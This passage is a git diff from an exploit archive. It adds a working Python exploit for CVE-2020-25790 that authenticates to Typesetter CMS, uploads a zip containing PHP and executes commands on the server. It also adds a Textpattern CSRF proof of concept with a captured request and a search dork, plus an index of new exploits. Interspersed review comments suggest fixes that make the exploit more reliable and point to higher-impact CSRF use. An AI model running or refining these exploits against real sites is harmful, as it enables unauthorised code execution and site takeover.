█████╔╝╚██████╔╝ + ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚════╝ ╚═════╝ + +by: t0gu + + +usage: main.py [-h] -p PASSWORD -l LOGIN -u URL + +==> Exploit for CVE 2020-25790 + +optional arguments: + -h, 
--help show this help message and exit + -p PASSWORD, --password PASSWORD + ==> admin password + -l LOGIN, --login LOGIN + ==> admin login + -u URL, --url URL ==> main URL + + """ + +print(banner) +menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790") +menu.add_argument("-p", "--password", required=True, help="==> admin password") +menu.add_argument("-l", "--login", required=True, help="==> admin login") +menu.add_argument("-u", "--url", required=True, help="==> main URL") +menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside") +args = menu.parse_args() + +login = args.login +password = args.password +url = args.url +file = args.file + + +PROXIES = proxies = { + "http": "http://127.0.0.1:8080", + "https": "https://127.0.0.1:8080", +} + + +class Exploit: + + def __init__(self, login, password, url, file): + self.login = login + self.password = password + self.url = url + self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari" + self.file = open(file, 'rb') + + def get_nounce(self): + try: + url = self.url + "/Admin" + r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False) + data = r.text + soap_obj = BeautifulSoup(data, 'html.parser') + for inp in soap_obj.find_all("input"): + for v in inp: + nounce = v['value'] + if nounce != None or nounce != "": + return nounce + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + + def get_hash_folders(self): + + cookie_auth = self.get_cookies() + hash_verified = self.get_verified() + data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1} + try: + url = self.url + "/Admin_Finder" + r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False) + json_data = r.json() + hash_dir = json_data['files'][2]['hash'] 
+ return hash_dir + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + + def get_cookies(self): + + nounce = self.get_nounce() + if nounce: + try: + url = self.url + "/Admin" + data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '', + 'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '', + 'remember': 'on', 'verified': ''} + r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False, + headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'}) + cookie_admin = r.headers['Set-Cookie'] + cookie_name = cookie_admin.split(':')[0].split('=')[0] + cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0] + + if cookie_name == None or cookie_name == "": + if cookie_value == None or cookie_value == "": + print("==> Something went wrong while login") + else: + data = f"{cookie_name}={cookie_value};" + return data + except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e: + print(f'==> Error while login {e}') + + def upload_zip(self): + url = self.url + '/Admin_Finder' + hash_verified = self.get_verified() + hash_dir = self.get_hash_folders() + auth_cookie = self.get_cookies() + + try: + print(f"==> Uploading file: {self.file}") + data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified} + r = requests.post(url=url, verify=False, timeout=10, + headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file}) + hash_file = r.json()['added'][0]['hash'] + self.extract_file(auth_cookie, hash_file, hash_verified) + except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e: + print(f"==> Error while uploading {e}") + + + def extract_file(self, auth_cookie, hash_file, hash_verified): + data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file} + try: + url = self.url + "/Admin_Finder" + r = 
requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) + name_file = r.json()['added'][0]['name'] + print(f"==> All Hashes are collected from: {name_file}") + self.xpl(auth_cookie,name_file) + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + + + def xpl(self, auth_cookie, name_file): + try: + url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id" + new_url = url.replace("index.php", "") + print(f"==> Try to exploit: {new_url}") + r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) + pattern = r'
(.*?)
' + m = re.search(pattern, r.text.replace("\n", "")) + if m is not None and m != "": + print(f"==> Vulnerable: {m.group(1)}") + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + + + def get_verified(self): + try: + url = self.url + "/Admin/Uploaded" + auth_cookie = self.get_cookies() + r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) + data = r.text + pattern_regex = r'"verified":"(.*)"}' + m = re.search(pattern_regex, data) + if m is not None or m != "": + return m.group(1) + + except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: + print(f'==> Error {e}') + +if __name__ == "__main__": + obj = Exploit(login, password, url, file) + obj.upload_zip() \ No newline at end of file diff --git a/exploits/php/webapps/48907.txt b/exploits/php/webapps/48907.txt new file mode 100644 index 000000000..5bf6d2454 --- /dev/null +++ b/exploits/php/webapps/48907.txt 
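Review bot: `get_verified()` ends with `if m is not None or m != "":` — with `or` the branch is also taken when `m` is None, so a failed regex search raises `AttributeError` on `m.group(1)` instead of reaching the error message; it should read `if m is not None:`, and the same inverted check in `get_nounce()` (`if nounce != None or nounce != "":`) is always true, so that method returns the first `<input>` value on the login page whether or not it is the nonce. `get_hash_folders`, `upload_zip` and `get_verified` each obtain credentials through a fresh `get_cookies()` call, so one run logs in to the target four or five times; log in once in `__init__`, store the cookie, and reuse it. Also `self.file = open(file, 'rb')` is never closed, `PROXIES` is defined but never passed to any request, `verify=False` is used without `urllib3.disable_warnings`, and `hash_dir = json_data['files'][2]['hash']` pins the upload target to the third entry of the directory listing without checking its name.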
@@ -0,0 +1,137 @@ +# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery +# Exploit Author: Alperen Ergel +# Contact: @alpren_ae +# Software Homepage: https://textpattern.com/ +# Version : 4.6.2 +# Tested on: windows 10 / xammp +# Category: WebApp +# Google Dork: intext:"Published with Textpattern CMS" +# Date: 2020-10-29 +######## Description ######## +# +# 1-) Loggin administrator page +# +# 2-) Go admin > prefs > site +# +# 3-) All inputs vulnerable to CSRF +# +# +######## Proof of Concept ######## + +========>>> REQUEST <<<========= + +POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/textpattern/textpattern/index.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 1806 +Connection: close +Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40 +Upgrade-Insecure-Requests: 1 + +Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0& +is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7& +use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles& +file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=& +smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4& 
+title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1& +use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1& +include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0& +comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1& +comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=& +custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=& +step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720 + + +### EXPLOIT #### + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index df3f74600..a1b83a21d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
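Review bot: The captured request includes `_txp_token=0342db47efb6882b488f6d367067d720`, which looks like Textpattern's per-user anti-CSRF token; a CSRF claim has to show that the prefs save is accepted when that parameter is missing or wrong, and the write-up never does. Add the result of replaying the request without `_txp_token` (or with a stale one). If it is accepted, the impact is much larger than "all inputs vulnerable": the body flips `allow_page_php_scripting=1&allow_article_php_scripting=1` and `use_plugins=1`, so one forged request could turn on PHP execution in pages for a logged-in admin — that is the headline. The HTML auto-submit form under `### EXPLOIT ####` is empty in this listing; restore it.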
@@ -40710,6 +40710,22 @@ id,file,description,date,author,type,platform,port 48889,exploits/php/webapps/48889.txt,"Seat Reservation System 1.0 - Unauthenticated SQL Injection",2020-10-16,"Rahul Ramkumar",webapps,php, 48890,exploits/php/webapps/48890.txt,"CS-Cart 1.3.3 - 'classes_dir' LFI",2020-10-16,0xmmnbassel,webapps,php, 48891,exploits/php/webapps/48891.txt,"CS-Cart 1.3.3 - authenticated RCE",2020-10-16,0xmmnbassel,webapps,php, +48892,exploits/php/webapps/48892.txt,"Tourism Management System 1.0 - Arbitrary File Upload",2020-10-19,"Ankita Pal",webapps,php, +48893,exploits/php/webapps/48893.txt,"Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting",2020-10-19,"Matthew Aberegg",webapps,php, +48894,exploits/php/webapps/48894.txt,"Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection",2020-10-19,"Matthew Aberegg",webapps,php, +48895,exploits/php/webapps/48895.txt,"Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection",2020-10-19,"Matthew Aberegg",webapps,php, +48896,exploits/php/webapps/48896.txt,"Online Student's Management System 1.0 - Remote Code Execution (Authenticated)",2020-10-19,"Akıner Kısa",webapps,php, +48897,exploits/php/webapps/48897.txt,"Online Discussion Forum Site 1.0 - XSS in Messaging System",2020-10-19,j5oh,webapps,php, +48898,exploits/php/webapps/48898.txt,"Online Job Portal 1.0 - Cross Site Scripting (Stored)",2020-10-19,"Akıner Kısa",webapps,php, +48899,exploits/hardware/webapps/48899.sh,"HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal",2020-10-19,"Alexei Kojenov",webapps,hardware, +48900,exploits/hardware/webapps/48900.sh,"HiSilicon Video Encoders - RCE via unauthenticated command injection",2020-10-19,"Alexei Kojenov",webapps,hardware, +48901,exploits/hardware/webapps/48901.sh,"HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware",2020-10-19,"Alexei Kojenov",webapps,hardware, +48902,exploits/hardware/webapps/48902.sh,"HiSilicon Video Encoders - Full 
admin access via backdoor password",2020-10-19,"Alexei Kojenov",webapps,hardware, +48903,exploits/hardware/webapps/48903.sh,"HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)",2020-10-19,"Alexei Kojenov",webapps,hardware, +48904,exploits/java/webapps/48904.txt,"Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in",2020-10-19,"Daniel Morris",webapps,java, +48905,exploits/php/webapps/48905.txt,"Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)",2020-10-19,Kokn3t,webapps,php, +48906,exploits/php/webapps/48906.py,"Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)",2020-10-19,"Rodolfo Tavares",webapps,php, +48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
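Review bot: The index entry for 48892 credits only `Ankita Pal` while the file header reads `Ankita Pal & Saurav Shukla`, and 48904 is attributed to `Daniel Morris` here but `dmw0ng` in the file — if that is a handle-to-name mapping it is fine, otherwise the CSV should match the files. The 48892 description also omits `(Authenticated)` although its PoC goes through `/admin/create-package.php` with a session cookie, unlike 48896 and 48906 which carry the tag.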